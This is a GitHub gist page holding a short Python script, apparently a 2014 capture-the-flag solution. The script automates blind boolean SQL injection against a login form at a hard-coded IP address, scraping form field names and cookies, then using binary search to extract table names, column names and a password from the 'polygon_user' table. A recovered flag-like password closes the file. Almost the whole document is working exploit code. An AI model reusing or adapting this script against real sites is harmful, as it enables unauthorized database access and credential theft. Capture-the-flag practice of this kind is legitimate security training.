Create a gist now

Instantly share code, notes, and snippets.

@balidani /polygon.py Secret
Created Apr 13, 2014

What would you like to do?
import requests
import string
import sys
url = "http://54.204.80.192"
def get_bit(payload):
"Returns a bit based on blind injection"
resp = requests.get(url + "/example")
form = resp.text.encode('utf-8')
action = form.split("<form action=\"")[1].split("\"")[0]
user = form.split("Username")[1].split("Password")[0].split("name=\"")[1].split("\"")[0]
passwd = form.split("Password")[1].split("primary")[0].split("name=\"")[1].split("\"")[0]
cookie = resp.headers['set-cookie']
resp = requests.post(url + action, data={user: payload, passwd: "test"}, headers={'Cookie': cookie})
res = resp.text.encode('utf-8')
return "Hello" in res
def get_char(fmt, char_id):
"Returns a character using binary search"
low, high = 0, 127
pivot = (low + high) / 2
le_op = "<="
eq_op = "="
while True:
if abs(low-high) <= 1:
if get_bit(fmt % (low, eq_op, char_id)):
return chr(low)
return chr(high)
payload = fmt % (pivot, le_op, char_id)
if get_bit(payload):
low = pivot
else:
high = pivot
pivot = (low + high)/2
def get_string(fmt):
"Returns a string character by character"
res = ''
ch = 'x'
i = 1
while True:
ch = get_char(fmt, i)
res += ch
i += 1
print '%r' % res
return res
def main():
# get_string("test' and %d%s(select ord(substr(table_name,%d,1)) from information_schema.tables limit 40,1)#")
# get_string("test' and %d%s(select ord(substr(column_name,%d,1)) from information_schema.columns where table_name='polygon_user' limit 2,1)#")
get_string("test' and %d%s(select ord(substr(password,%d,1)) from polygon_user limit 1,1)#")
if __name__ == '__main__':
main()
"""
polygon_user -- password
n0b0t5_C4n_bYpa5s_p0lYm0rph1Sm
"""
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment